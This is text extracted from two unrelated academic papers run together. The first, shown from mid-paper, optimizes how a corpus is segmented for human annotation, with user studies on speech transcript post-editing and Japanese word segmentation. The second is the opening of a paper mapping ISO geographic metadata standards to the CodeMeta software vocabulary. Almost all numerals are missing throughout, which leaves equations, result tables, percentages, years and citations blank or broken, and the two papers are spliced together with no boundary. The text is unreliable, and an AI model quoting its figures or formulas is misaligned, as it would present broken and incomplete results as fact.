where larger values are intuitively better, we flip the sign before defining ul,mj (w sj+ sj ) to maintain consistency (e.g. negative number of er- rors removed). . multiple criteria optimization in the case of a single criterion (|l|= ), we obtain a simple, single-objective unconstrained linear opti- mization problem, efficiently solvable via dynamic programming (terzi and tsaparas, ). however, in practice one usually encounters several compet- ing criteria, such as cost and utility, and here we will focus on this more realistic setting. we balance competing criteria by using one as an optimization objective, and the others as constraints. let crite- this approach is known as the bounded objective function method in multi-objective optimization literature (marler and arora, ). the very popular weighted sum method merges criteria into a single efficiency measure, but is problematic in our case because the number of supervised tokens is unspec- ified. unless the weights are carefully chosen, the algorithm might find, e.g., the completely unsupervised or completely su- (at)% (what’s)% a% bright% …% [respeak: . / ]/ [skip: / ]/ / cold% / / / / / [type: / ]/ [type: / ]/ [type: / ]/ [respeak: / ]/[skip: / ]/ figure : excerpt of a segmentation graph for an ex- ample transcription task similar to figure (some edges are omitted for readability). edges are labeled with their mode, predicted number of errors that can be removed, and necessary supervision time. a segmentation scheme might prefer solid edges over dashed ones in this exam- ple. rion l be the optimization objective criterion, and let cl denote the constraining constants for the cri- teria l l�l = l \ {l }. we state the optimization problem: min m ;sm+ ;m m mx j= ⇥ ul ,mj � w sj+ sj �⇤ s.t. mx j= ⇥ ul,mj � w sj+ sj �⇤  cl ( l l�l ) this constrained optimization problem is difficult to solve. in fact, the np-hard multiple-choice knap- sack problem (pisinger, ) corresponds to a spe- cial case of our problem in which the number of seg- ments is equal to the number of tokens, implying that our more general problem is np-hard as well. in order to overcome this problem, we refor- mulate search for the optimal segmentation as a resource-constrained shortest path problem in a di- rected, acyclic multigraph. while still not efficiently solvable in theory, this problem is well studied in domains such as vehicle routing and crew schedul- ing (irnich and desaulniers, ), and it is known that in many practical situations the problem can be solved reasonably efficiently using integer linear programming relaxations (toth and vigo, ). in our formalism, the set of nodes v represents the spaces between neighboring tokens, at which the algorithm may insert segment boundaries. a node with index i represents a segment break before the i-th token, and thus the sequence of the indices in a path directly corresponds to sm + . edges e de- note the grouping of tokens between the respective pervised segmentation to be most “efficient.” nodes into one segment. edges are always directed from left to right, and labeled with a supervision mode. in addition, each edge between nodes i and j is assigned ul,k(w j� i ), the corresponding predicted value for each criterion l l and supervision mode k k, indicating that the supervision mode of the j-th segment in a path directly corresponds to mj . figure shows an example of what the result- ing graph may look like. our original optimization problem is now equivalent to finding the shortest path between the first and last nodes according to criterion l , while obeying the given resource con- straints. according to a widely used formulation for the resource constrained shortest path problem, we can define eij as the set of competing edges between i and j, and express this optimization problem with the following integer linear program (ilp): min x x i,j v x k eij xijkul ,k(s j� i ) ( ) s.t. x i,j v x k eij xijkul,k(s j� i )  cl ( l l�l ) ( ) x i v k eij xijk = x i v k eij xjik ( j v \{ , n}) ( ) x j v k e j x jk = ( ) x i v k ein xink = ( ) xijk { , } ( xijk x) ( ) the variables x={xijk|i, j v , k eij } denote the activation of the k’th edge between nodes i and j. the shortest path according to the minimization objective ( ), that still meets the resource constraints for the specified criteria ( ), is to be computed. the degree constraints ( , , ) specify that all but the first and last nodes must have as many incoming as out- going edges, while the first node must have exactly one outgoing, and the last node exactly one incom- ing edge. finally, the integrality condition ( ) forces all edges to be either fully activated or fully deacti- vated. the outlined problem formulation can solved directly by using off-the-shelf ilp solvers, here we employ gurobi (gurobi optimization, ). . heuristics for approximation in general, edges are inserted for every supervision mode between every combination of two nodes. the search space can be constrained by removing some of these edges to increase efficiency. in this study, we only consider edges spanning at most tokens. for cases in which larger corpora are to be anno- tated, or when the acceptable delay for delivering re- sults is small, a suitable segmentation can be found approximately. the easiest way would be to parti- tion the corpus, e.g. according to its individual doc- uments, divide the budget constraints evenly across all partitions, and then segment each partition inde- pendently. more sophisticated methods might ap- proximate the pareto front for each partition, and distribute the budgets in an intelligent way. user modeling while the proposed framework is able to optimize the segmentation with respect to each criterion, it also rests upon the assumption that we can provide user models ul,k(w j� i ) that accurately evaluate ev- ery segment according to the specified criteria and supervision modes. in this section, we discuss our strategies for estimating three conceivable criteria: annotation cost, correction of errors, and improve- ment of a classifier. . annotation cost modeling modeling cost requires solving a regression prob- lem from features of a candidate segment to annota- tion cost, for example in terms of supervision time. appropriate input features depend on the task, but should include notions of complexity (e.g. a confi- dence measure) and length of the segment, as both are expected to strongly influence supervision time. we propose using gaussian process (gp) regres- sion for cost prediction, a start-of-the-art nonpara- metric bayesian regression technique (rasmussen and williams, ) . as reported on a similar task by cohn and specia ( ), and confirmed by our preliminary experiments, gp regression signifi- cantly outperforms popular techniques such as sup- code available at http://www.gaussianprocess.org/gpml/ port vector regression and least-squares linear re- gression. we also follow their settings for gp, em- ploying gp regression with a squared exponential kernel with automatic relevance determination. de- pending on the number of users and amount of train- ing data available for each user, models may be trained separately for each user (as we do here), or in a combined fashion via multi-task learning as pro- posed by cohn and specia ( ). it is also crucial for the predictions to be reliable throughout the whole relevant space of segments. if the cost of certain types of segments is system- atically underpredicted, the segmentation algorithm might be misled to prefer these, possibly a large number of times. an effective trick to prevent such underpredictions is to predict the log time instead of the actual time. in this way, errors in the critical low end are penalized more strongly, and the time can never become negative. . error correction modeling as one utility measure, we can use the number of errors corrected, a useful measure for post editing tasks over automatically produced annotations. in order to measure how many errors can be removed by supervising a particular segment, we must es- timate both how many errors are in the automatic annotation, and how reliably a human can remove these for a given supervision mode. most machine learning techniques can estimate confidence scores in the form of posterior probabil- ities. to estimate the number of errors, we can sum over one minus the posterior for all tokens, which estimates the hamming distance from the reference annotation. this measure is appropriate for tasks in which the number of tokens is fixed in advance (e.g. a part-of-speech estimation task), and a reasonable approximation for tasks in which the number of to- kens is not known in advance (e.g. speech transcrip- tion, cf. section . . ). predicting the particular tokens at which a human will make a mistake is known to be a difficult task (olson and olson, ), but a simplifying constant for instance, consider a model that predicts well for seg- ments of medium size or longer, but underpredicts the supervi- sion time of single-token segments. this may lead the segmen- tation algorithm to put every token into its own segment, which is clearly undesirable. human error rate can still be useful. for example, in the task from section , we may suspect a certain number of errors in a transcript segment, and predict, say, % of those errors to be removed via typing, but only % via respeaking. . classifier improvement modeling another reasonable utility measure is accuracy of a classifier trained on the data we choose to annotate in an active learning framework. confidence scores have been found useful for ranking particular tokens with regards to how much they will improve a clas- sifier (settles, ). here, we may similarly score segment utility as the sum of its token confidences, although care must be taken to normalize and cali- brate the token confidences to be linearly compara- ble before doing so. while the resulting utility score has no interpretation in absolute terms, it can still be used as an optimization objective (cf. section . . ). experiments in this section, we present experimental results ex- amining the effectiveness of the proposed method over two tasks: speech transcription and japanese word segmentation. . speech transcription experiments accurate speech transcripts are a much-demanded nlp product, useful by themselves, as training ma- terial for asr, or as input for follow-up tasks like speech translation. with recognition accuracies plateauing, manually correcting (post editing) auto- matic speech transcripts has become popular. com- mon approaches are to identify words (sanchez- cortina et al., ) or (sub-)sentences (sperber et al., ) of low confidence, and have a human edi- tor correct these. . . experimental setup we conduct a user study in which participants post-edited speech transcripts, given a fixed goal word error rate. the transcription setup was such that the transcriber could see the asr transcript of parts before and after the segment that he was edit- ing, providing context if needed. when imprecise time alignment resulted in segment breaks that were software and experimental data can be downloaded from http://www.msperber.com/research/tacl-segmentation/ slightly “off,” as happened occasionally, that context helped guess what was said. the segment itself was transcribed from scratch, as opposed to editing the asr transcript; besides being arguably more effi- cient when the asr transcript contains many mis- takes (nanjo et al., ; akita et al., ), prelim- inary experiments also showed that supervision time is far easier to predict this way. figure illustrates what the setup looked like. we used a self-developed transcription tool to conduct experiments. it presents our computed seg- ments one by one, allows convenient input and play- back via keyboard shortcuts, and logs user interac- tions with their time stamps. a selection of ted talks (english talks on technology, entertainment, and design) served as experimental data. while some of these talks contain jargon such as medi- cal terms, they are presented by skilled speakers, making them comparably easy to understand. initial transcripts were created using the janus recognition toolkit (soltau et al., ) with a standard, ted- optimized setup. we used confusion networks for decoding and obtaining confidence scores. for reasons of simplicity, and better compara- bility to our baseline, we restricted our experiment to two supervision modes: type and skip. we conducted experiments with participants, with several years of experience in transcription, with none. each participant received an explanation on the transcription guidelines, and a short hands-on training to learn to use our tool. next, they tran- scribed a balanced selection of segments of varying length and quality in random order. this data was used to train the user models. finally, each participant transcribed another ted talks, with word error rate (wer) . % (predicted: . %). we set a target (predicted) wer of % as our optimization constraint, and minimize the predicted supervision time as our ob- jective function. both ted talks were transcribed once using the baseline strategy, and once using the proposed strategy. the order of both strategies was reversed between talks, to minimize learning bias due to transcribing each talk twice. the baseline strategy was adopted according to www.ted.com depending on the level of accuracy required by our final application, this target may be set lower or higher. sperber et al. ( ): we segmented the talk into natural, subsentential units, using matusov et al. ( )’s segmenter, which we tuned to reproduce the ted subtitle segmentation, producing a mean segment length of . words. segments were added in order of increasing average word confidence, until the user model predicted a wer< %. the second segmentation strategy was the proposed method, similarly with a resource constraint of wer< %. supervision time was predicted via gp regres- sion (cf. section . ), using segment length, au- dio duration, and mean confidence as input features. the output variable was assumed subject to addi- tive gaussian noise with zero mean, a variance of seconds was chosen empirically to minimize the mean squared error. utility prediction (cf. section . ) was based on posterior scores obtained from the confusion networks. we found it important to calibrate them, as the posteriors were overconfident especially in the upper range. to do so, we automat- ically transcribed a development set of ted data, grouped the recognized words into buckets accord- ing to their posteriors, and determined the average number of errors per word in each bucket from an alignment with the reference transcript. the map- ping from average posterior to average number of errors was estimated via gp regression. the result was summed over all tokens, and multiplied by a constant human confidence, separately determined for each participant. . . simulation results to convey a better understanding of the poten- tial gains afforded by our method, we first present a simulated experiment. we assume a transcriber who makes no mistakes, and needs exactly the amount of time predicted by a user model trained on the data of a randomly selected participant. we compare three scenarios: a baseline simulation, in which the base- line segments are transcribed in ascending order of confidence; a simulation using the proposed method, in which we change the wer constraint in small in- crements; finally, an oracle simulation, which uses more elaborate methods for wer estimation exist, such as by ogawa et al. ( ), but if our method achieves improve- ments using simple hamming distance, incorporating more so- phisticated measures will likely achieve similar, or even better accuracy. ( ) skip: “nineteen forty six until today you see the green” ( ) type: <annotator types: “is the traditional”> ( ) skip: “interstate conflict” ( ) type: <annotator types: “the ones we used to”> ( ) skip: . . . figure : result of our segmentation method (excerpt). type segments are displayed empty and should be tran- scribed from scratch. for skip segments, the asr tran- script is displayed to provide context. when annotating a segment, the corresponding audio is played back. post editing time [min] r es ul tin g w e r [% ] baseline proposed oracle figure : simulation of post editing on example ted talk. the proposed method reduces the wer consider- ably faster than the baseline at first, later both converge. the much superior oracle simulation indicates room for further improvement. the proposed method, but uses a utility model that knows the actual number of errors in each segment. for each supervised segment, we simply replace the asr output with the reference, and measure the re- sulting wer. figure shows the simulation on an example ted talk, based on an initial transcript with . % wer. the proposed method is able to reduce the wer faster than the baseline, up to a certain point where they converge. the oracle simulation is even faster, indicating room for improvement through better confidence scores. . . user study results table shows the results of the user study. first, we note that the wer estimation by our utility model was off by about . %: while the predicted improvement in wer was from . % to . %, the actual improvement was from . % to about . %. the actual resulting wer was consistent participant baseline proposed wer time wer time p . : . : p . : . : p . : . : avg . : . : table : transcription task results. for each user, the resulting wer [%] after supervision is shown, along with the time [min] they needed. the unsupervised wer was . %. across all users, and we observe strong, consistent reductions in supervision time for all participants. prediction of the necessary supervision time was ac- curate: averaged over participants, : minutes were predicted for the baseline, : minutes mea- sured. for the proposed method, : minutes were predicted, : minutes measured. on average, participants removed . errors per minute using the baseline, and . errors per minute using the proposed method, a speed-up of . %. note that predicted and measured values are not strictly comparable: in the experiments, to provide a fair comparison participants transcribed the same talks twice (once using baseline, once the proposed method, in alternating order), resulting in a notice- able learning effect. the user model, on the other hand, is trained to predict the case in which a tran- scriber conducts only one transcription pass. as an interesting finding, without being informed about the order of baseline and proposed method, participants reported that transcribing according to the proposed segmentation seemed harder, as they found the baseline segmentation more linguistically reasonable. however, this perceived increase in dif- ficulty did not show in efficiency numbers. . japanese word segmentation experiments word segmentation is the first step in nlp for lan- guages that are commonly written without word boundaries, such as japanese and chinese. we ap- ply our method to a task in which we domain-adapt a word segmentation classifier via active learning. in this experiment, participants annotated whether or not a word boundary occurred at certain positions in a japanese sentence. the tokens to be grouped into segments are positions between adjacent characters. . . experimental setup neubig et al. ( ) have proposed a pointwise method for japanese word segmentation that can be trained using partially annotated sentences, which makes it attractive in combination with active learn- ing, as well as our segmentation method. the authors released their method as a software pack- age “kytea” that we employed in this user study. we used kytea’s active learning domain adaptation toolkit as a baseline. for data, we used the balanced corpus of con- temporary written japanese (bccwj), created by maekawa ( ), with the internet q&a subcor- pus as in-domain data, and the whitepaper subcor- pus as background data, a domain adaptation sce- nario. sentences were drawn from the in-domain corpus, and the manually annotated data was then used to train kytea, along with the pre-annotated background data. the goal (objective function) was to improve kytea’s classification accuracy on an in- domain test set, given a constrained time budget of minutes. there were again supervision modes: annotate and skip. note that this is essentially a batch active learning setup with only one iteration. we conducted experiments with one expert with several years of experience with japanese word seg- mentation annotation, and three non-expert native speakers with no prior experience. japanese word segmentation is not a trivial task, so we provided non-experts with training, including explanation of the segmentation standard, a supervised test with immediate feedback and explanations, and hands-on training to get used to the annotation software. supervision time was predicted via gp regression (cf. section . ), using the segment length and mean confidence as input features. as before, the output variable was assumed subject to additive gaussian noise with zero mean and seconds variance. to ob- tain training data for these models, each participant annotated about example instances, drawn from the adaptation corpus, grouped into segments and balanced regarding segment length and difficulty. for utility modeling (cf. section . ), we first nor- malized kytea’s confidence scores, which are given in terms of svm margin, using a sigmoid function (platt, ). the normalization parameter was se- http://www.phontron.com/kytea/active.html lected so that the mean confidence on a development set corresponded to the actual classifier accuracy. we derive our measure of classifier improvement for correcting a segment by summing over one minus the calibrated confidence for each of its tokens. to analyze how well this measure describes the actual training utility, we trained kytea using the back- ground data plus disjoint groups of in-domain instances with similar probabilities and measured the achieved reduction of prediction errors. the cor- relation between each group’s mean utility and the achieved error reduction was . . note that we ig- nore the decaying returns usually observed as more data is added to the training set. also, we did not attempt to model user errors. employing a con- stant base error rate, as in the transcription scenario, would change segment utilities only by a constant factor, without changing the resulting segmentation. after creating the user models, we conducted the main experiment, in which each participant anno- tated data that was selected from a pool of in-domain sentences using two strategies. the first, baseline strategy was as proposed by neubig et al. ( ). queries are those instances with the low- est confidence scores. each query is then extended to the left and right, until a word boundary is pre- dicted. this strategy follows similar reasoning as was the premise to this paper: to decide whether or not a position in a text corresponds to a word bound- ary, the annotator has to acquire surrounding context information. this context acquisition is relatively time consuming, so he might as well label the sur- rounding instances with little additional effort. the second strategy was our proposed, more principled approach. queries of both methods were shuffled to minimize bias due to learning effects. finally, we trained kytea using the results of both methods, and compared the achieved classifier improvement and supervision times. . . user study results table summarizes the results of our experi- ment. it shows that the annotations by each partic- ipant resulted in a better classifier for the proposed method than the baseline, but also took up consider- ably more time, a less clear improvement than for the transcription task. in fact, the total error for time predictions was as high as . % on average, participant baseline proposed time acc. time acc. expert : . : . nonexp : . : . nonexp : . : . nonexp : . : . table : word segmentation task results, for our ex- pert and non-expert participants. for each participant, the resulting classifier accuracy [%] after supervision is shown, along with the time [min] they needed. the unsu- pervised accuracy was . %. where the baseline method tended take less time than predicted, the proposed method more time. this is in contrast to a much lower total error (within %) when cross-validating our user model training data. this is likely due to the fact that the data for train- ing the user model was selected in a balanced man- ner, as opposed to selecting difficult examples, as our method is prone to do. thus, we may expect much better predictions when selecting user model training data that is more similar to the test case. plotting classifier accuracy over annotation time draws a clearer picture. let us first analyze the re- sults for the expert annotator. figure (e. ) shows that the proposed method resulted in consistently better results, indicating that time predictions were still effective. note that this comparison may put the proposed method at a slight disadvantage by com- paring intermediate results despite optimizing glob- ally. for the non-experts, the improvement over the baseline is less consistent, as can be seen in fig- ure (n. ) for one representative. according to our analysis, this can be explained by two factors: ( ) the non-experts’ annotation error ( . % on av- erage) was much higher than the expert’s ( . %), resulting in a somewhat irregular classifier learn- ing curve. ( ) the variance in annotation time per segment was consistently higher for the non- experts than the expert, indicated by an average per-segment prediction error of % vs. % rela- tive to the mean actual value, respectively. infor- mally speaking, non-experts made more mistakes, and were more strongly influenced by the difficulty of a particular segment (which was higher on av- erage with the proposed method, as indicated by a . . . . . . . . . . . . . . . . prop. basel n. e. n. e. n. e. n. e. annotation time [min.] c la ss if ie r a cc ur ac y . figure : classifier improvement over time, depicted for the expert (e) and a non-expert (n). the graphs show numbers based on ( ) actual annotations and user mod- els as in sections . and . , ( ) error-free annotations, ( ) measured times replaced by predicted times, and ( ) both reference annotations and replaced time predictions. lower average confidence). in figures ( - ) we present a simulation experi- ment in which we first pretend as if annotators made no mistakes, then as if they needed exactly as much time as predicted for each segment, and then both. this cheating experiment works in favor of the pro- posed method, especially for the non-expert. we may conclude that our segmentation approach is ef- fective for the word segmentation task, but requires more accurate time predictions. better user models will certainly help, although for the presented sce- nario our method may be most useful for an expert annotator. note that the non-expert in the figure annotated much faster than the expert, which explains the comparable classification result despite making more annotation errors. this is in contrast to the other non-experts, who were slower. . computational efficiency since our segmentation algorithm does not guar- antee polynomial runtime, computational efficiency was a concern, but did not turn out problematic. on a consumer laptop, the solver produced seg- mentations within a few seconds for a single docu- ment containing several thousand tokens, and within hours for corpora consisting of several dozen doc- uments. runtime increased roughly quadratically with respect to the number of segmented tokens. we feel that this is acceptable, considering that the time needed for human supervision will likely dominate the computation time, and reasonable approxima- tions can be made as noted in section . . relation to prior work efficient supervision strategies have been studied across a variety of nlp-related research areas, and received increasing attention in recent years. ex- amples include post editing for speech recogni- tion (sanchez-cortina et al., ), interactive ma- chine translation (gonzález-rubio et al., ), ac- tive learning for machine translation (haffari et al., ; gonzález-rubio et al., ) and many other nlp tasks (olsson, ), to name but a few studies. it has also been recognized by the active learn- ing community that correcting the most useful parts first is often not optimal in terms of efficiency, since these parts tend to be the most difficult to manually annotate (settles et al., ). the authors advocate the use of a user model to predict the supervision ef- fort, and select the instances with best “bang-for-the- buck.” this prediction of supervision effort was suc- cessful, and was further refined in other nlp-related studies (tomanek et al., ; specia, ; cohn and specia, ). our approach to user modeling using gp regression is inspired by the latter. most studies on user models consider only super- vision effort, while neglecting the accuracy of hu- man annotations. the view on humans as a perfect oracle has been criticized (donmez and carbonell, ), since human errors are common and can negatively affect supervision utility. research on human-computer-interaction has identified the mod- eling of human errors as very difficult (olson and olson, ), depending on factors such as user ex- perience, cognitive load, user interface design, and fatigue. nevertheless, even the simple error model used in our post editing task was effective. the active learning community has addressed the problem of balancing utility and cost in some more detail. the previously reported “bang-for-the-buck” approach is a very simple, greedy approach to com- bine both into one measure. a more theoretically founded scalar optimization objective is the net ben- efit (utility minus costs) as proposed by vijaya- narasimhan and grauman ( ), but unfortunately is restricted to applications where both can be ex- pressed in terms of the same monetary unit. vijaya- narasimhan et al. ( ) and donmez and carbonell ( ) use a more practical approach that specifies a constrained optimization problem by allowing only a limited time budget for supervision. our approach is a generalization thereof and allows either specify- ing an upper bound on the predicted cost, or a lower bound on the predicted utility. the main novelty of our presented approach is the explicit modeling and selection of segments of various sizes, such that annotation efficiency is opti- mized according to the specified constraints. while some works (sassano and kurohashi, ; neubig et al., ) have proposed using subsentential seg- ments, we are not aware of any previous work that explicitly optimizes that segmentation. conclusion we presented a method that can effectively choose a segmentation of a language corpus that optimizes supervision efficiency, considering not only the ac- tual usefulness of each segment, but also the anno- tation cost. we reported noticeable improvements over strong baselines in two user studies. future user experiments with more participants would be desir- able to verify our observations, and allow further analysis of different factors such as annotator ex- pertise. also, future research may improve the user modeling, which will be beneficial for our method. acknowledgments the research leading to these results has received funding from the european union seventh frame- work programme (fp / - ) under grant agreement n bridges across the language divide (eu-bridge). references yuya akita, masato mimura, and tatsuya kawahara. . automatic transcription system for meetings of the japanese national congress. in interspeech, pages – , brighton, uk. trevor cohn and lucia specia. . modelling anno- tator bias with multi-task gaussian processes: an ap- plication to machine translation quality estimation. in association for computational linguistics confer- ence (acl), sofia, bulgaria. pinar donmez and jaime carbonell. . proactive learning : cost-sensitive active learning with mul- tiple imperfect oracles. in conference on information and knowledge management (cikm), pages – , napa valley, ca, usa. jesús gonzález-rubio, daniel ortiz-martı́nez, and fran- cisco casacuberta. . balancing user effort and translation error in interactive machine translation via confidence measures. in association for compu- tational linguistics conference (acl), short papers track, pages – , uppsala, sweden. jesús gonzález-rubio, daniel ortiz-martı́nez, and fran- cisco casacuberta. . an active learning scenario for interactive machine translation. in international conference on multimodal interfaces (icmi), pages – , alicante, spain. gurobi optimization. . gurobi optimizer refer- ence manual. gholamreza haffari, maxim roy, and anoop sarkar. . active learning for statistical phrase-based machine translation. in north american chapter of the association for computational linguistics - human language technologies conference (naacl- hlt), pages – , boulder, co, usa. stefan irnich and guy desaulniers. . shortest path problems with resource constraints. in column gen- eration, pages – . springer us. kikuo maekawa. . balanced corpus of contem- porary written japanese. in international joint con- ference on natural language processing (ijcnlp), pages – , hyderabad, india. r. timothy marler and jasbir s. arora. . survey of multi-objective optimization methods for engineer- ing. structural and multidisciplinary optimization, ( ): – , april. evgeny matusov, arne mauser, and hermann ney. . automatic sentence segmentation and punctuation prediction for spoken language translation. in inter- national workshop on spoken language translation (iwslt), pages – , kyoto, japan. hiroaki nanjo, yuya akita, and tatsuya kawahara. . computer assisted speech transcription sys- tem for efficient speech archive. in western pacific acoustics conference (wespac), seoul, korea. graham neubig, yosuke nakata, and shinsuke mori. . pointwise prediction for robust , adapt- able japanese morphological analysis. in associa- tion for computational linguistics: human language technologies conference (acl-hlt), pages – , portland, or, usa. atsunori ogawa, takaaki hori, and atsushi naka- mura. . discriminative recognition rate esti- mation for n-best list and its application to n-best rescoring. in international conference on acoustics, speech, and signal processing (icassp), pages – , vancouver, canada. judith reitman olson and gary olson. . the growth of cognitive modeling in human-computer interaction since goms. human-computer interac- tion, ( ): – , june. fredrik olsson. . a literature survey of active ma- chine learning in the context of natural language pro- cessing. technical report, sics sweden. david pisinger. . a minimal algorithm for the multiple-choice knapsack problem. european jour- nal of operational research, ( ): – . john c. platt. . probabilistic outputs for sup- port vector machines and comparisons to regularized likelihood methods. in advances in large margin classifiers, pages – . mit press. carl e. rasmussen and christopher k.i. williams. . gaussian processes for machine learning. mit press, cambridge, ma, usa. isaias sanchez-cortina, nicolas serrano, alberto san- chis, and alfons juan. . a prototype for inter- active speech transcription balancing error and su- pervision effort. in international conference on intel- ligent user interfaces (iui), pages – , lisbon, portugal. manabu sassano and sadao kurohashi. . using smaller constituents rather than sentences in ac- tive learning for japanese dependency parsing. in association for computational linguistics conference (acl), pages – , uppsala, sweden. burr settles, mark craven, and lewis friedland. . active learning with real annotation costs. in neural information processing systems conference (nips) - workshop on cost-sensitive learning, lake tahoe, nv, united states. burr settles. . an analysis of active learning strategies for sequence labeling tasks. in confer- ence on empirical methods in natural language pro- cessing (emnlp), pages – , honolulu, usa. hagen soltau, florian metze, christian fügen, and alex waibel. . a one-pass decoder based on poly- morphic linguistic context assignment. in auto- matic speech recognition and understanding work- shop (asru), pages – , madonna di campiglio, italy. lucia specia. . exploiting objective annota- tions for measuring translation post-editing effort. in conference of the european association for machine translation (eamt), pages – , nice, france. matthias sperber, graham neubig, christian fügen, satoshi nakamura, and alex waibel. . efficient speech transcription through respeaking. in inter- speech, pages – , lyon, france. bernhard suhm, brad myers, and alex waibel. . multimodal error correction for speech user inter- faces. transactions on computer-human interaction, ( ): – . evimaria terzi and panayiotis tsaparas. . efficient algorithms for sequence segmentation. in siam con- ference on data mining (sdm), bethesda, md, usa. katrin tomanek and udo hahn. . semi-supervised active learning for sequence labeling. in interna- tional joint conference on natural language process- ing (ijcnlp), pages – , singapore. katrin tomanek, udo hahn, and steffen lohmann. . a cognitive cost model of annotations based on eye-tracking data. in association for compu- tational linguistics conference (acl), pages – , uppsala, sweden. paolo toth and daniele vigo. . the vehicle routing problem. society for industrial & applied mathemat- ics (siam), philadelphia. sudheendra vijayanarasimhan and kristen grauman. . whats it going to cost you?: predicting ef- fort vs. informativeness for multi-label image anno- tations. in conference on computer vision and pat- tern recognition (cvpr), pages – , miami beach, fl, usa. sudheendra vijayanarasimhan, prateek jain, and kristen grauman. . far-sighted active learning on a bud- get for image and video recognition. in conference on computer vision and pattern recognition (cvpr), pages – , san francisco, ca, usa, june. submitted august accepted january published february corresponding author ted habermann, ted.habermann@gmail.com academic editor silvio peroni additional information and declarations can be found on page doi . /peerj-cs. copyright habermann distributed under creative commons cc-by . open access mapping iso - geographic metadata standards to codemeta ted habermann the hdf group, champaign, il, united states of america abstract the codemeta project recently proposed a vocabulary for software metadata. iso technical committee has published a set of metadata standards for geographic data and many kinds of related resources, including software. in order for iso metadata creators and users to take advantage of the codemeta recommendations, a mapping from iso elements to the codemeta vocabulary must exist. this mapping is complicated by differences in the approaches used by iso and codemeta, primarily a difference between hard and soft typing of metadata elements. these differences are described in detail and a mapping is proposed that includes sixty-four of the sixty-eight codemeta v terms. the codemeta terms have also been mapped to dialects used by twenty-one software repositories, registries and archives. the average number of terms mapped in these cases is . . the disparity between these numbers reflects the fact that many of the dialects that have been mapped to codemeta are focused on citation or dependency identification and management while iso and codemeta share additional targets that include access, use, and understanding. addressing this broader set of use cases requires more metadata elements. subjects digital libraries, software engineering keywords software citation, codemeta, iso metadata, metadata, crosswalk introduction the codemeta project (codemeta project, ) recently proposed ( ) a vocabulary for documenting software, ( ) mappings between metadata fields used by a broad range of software repositories, registries and archives (codemeta crosswalk, ), and ( ) developed software with the purpose of facilitating automatic translation between different representations of software metadata. the vocabulary was designed to support several different software use cases, including citation, discovery, use and, to some degree, understanding. the iso technical committee has developed generic metadata standards that are widely used for geographic data of many kinds. these standards were also designed as a foundation that can be built on to document many kinds of things and support many use cases (habermann, a; habermann, b; habermann, c). this paper describes a mapping between the conceptual model that underlies iso metadata (iso - , ) and codemeta with the goal of facilitating the creation of codemeta-compliant descriptions of software that is documented using the iso standards. the communities that developed these two metadata dialects share the important goal how to cite this article habermann t. . mapping iso - geographic metadata standards to codemeta. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:ted.habermann@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. of comprehensive standards that address multiple use cases for many disciplines. both groups pursue this goal by developing consensus, but the details of the processes used to develop their standards differ. iso tc represents a traditional international standards body with well-defined processes, publication methods and a business model that includes costs to users for standards documents. codemeta represents a community of volunteer practitioners with an initial set of proposed conventions open on the web and an invitation for adoption, experimentation and evolution. in addition to these process differences, there are also differences between the structures and implementations of these two models. these are described below with the mappings following. dialect coverage and scope mapping metadata for software between different schemas and dialects is an important technical goal of codemeta. this goal is supported using a crosswalk file that is maintained and contributed to in the codemeta git repository (codemeta crosswalk, ). this file lists the codemeta terms along with equivalents in twenty-one dialects. this crosswalk is the basis for translating content between these dialects. a similar situation occurs in many in science communities that are trying to support multiple use cases, i.e., document, share, and trust, for datasets using multiple metadata dialects (see gordon & habermann, ). the concept of ‘‘dialect coverage’’ has come up in those studies as the amount (%) of the concepts in a particular recommendation that a dialect includes. in the codemeta case, this is the number of codemeta concepts that can be represented in the dialects listed in the crosswalk file (crosswalk data, ). figure shows this count for each of the twenty-one dialects. these counts were determined from the crosswalk file by counting the number of cells with content in each column using a spreadsheet count() function. both versions of codemeta and iso - ( ) are included in this figure as well. the data show that the iso dialect covers very close to all ( / ) of the codemeta concepts and the other twenty-one dialects cover an average of . / , suggesting that codemeta is more similar to iso than it is to other dialects that have done crosswalks. the difference between the iso mapping and others is striking. it likely reflects the difference between the small number of metadata elements used for discovering and citing software (or data) and the larger number needed to be able to use it and trust it. in the current software citation landscape, this is the difference between the complete codemeta vocabulary, i.e., all metadata for code (over sixty items), and the force software citation guidelines, i.e., metadata for code citation (smith, katz & niemeyer, ) which includes only ten items. in some cases, multiple codemeta terms are mapped to the same iso elements. most of this ambiguity is related to differences in the two models and approaches that are discussed in detail below. iso elements that are mapped to more than one codemeta term are identified with * in the crosswalk tables below. model characteristics the iso metadata standards are based on a uml model that is harmonized across all standards developed and managed by the committee. the model is built around classes habermann ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure coverage of codemeta concepts in multiple dialects. the average number of codemeta con- cepts covered by twenty-one dialects is . . the iso dialect covers sixty-four of sixty-eight codemeta concepts. full-size doi: . /peerjcs. /fig- and attributes that describe the structure of the standards and the relationships among objects. iso - ( ) includes thirteen top-level classes that provide details on identification, content, constraints, distribution, quality, usage, reference systems, spatial representation and several other areas. the iso standard includes a scope element at the root of each record that gives the type of resource described by the metadata. the default scope is dataset, but other options include: aggregate, application, attribute, attributetype, collection, collectionhardware, collectionsession, coverage, dimensiongroup, document, feature, featuretype, fieldsession, initiative, metadata, model, nongeographicdataset, otheraggregate, platformseries, product, productionseries, propertytype, repository, sample, sensor, sensorseries, series, service, software, tile, transferaggregate (see habermann, a; habermann, b; habermann, c). mapping the codemeta vocabulary to the iso standard is an initial step toward defining the content that could be included in iso metadata records that describe software and applications, i.e., those where the scope is software. the most commonly used representation of the iso standards is xml (iso - , ). iso xpaths uniquely identify metadata content and follow the structure of the uml model, with levels in the xml alternating between objects (with types) and properties. this results in xml that is ‘‘striped’’ like the xml representation of the resource description framework (rdf, ) (w c, ), i.e., role/type/role/type/content. types generally start with two uppercase letters (md, ci, ...) that indicate the uml package that they are habermann ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. defined in (metadata, citation, ...) followed by an underscore (md_, ci_, ...). properties (termed roles in this discussion) are in lower camel case. a significant benefit of the striped xml is that properties can be defined with abstract objects that can share properties while being instantiated with different types. for example, the iso ci_party object is abstract and includes name and contactinfo properties. it is extended and specialized by ci_individual and ci_ organisation objects which inherit name and contactinfo properties and add properties that are relevant for people and organizations, 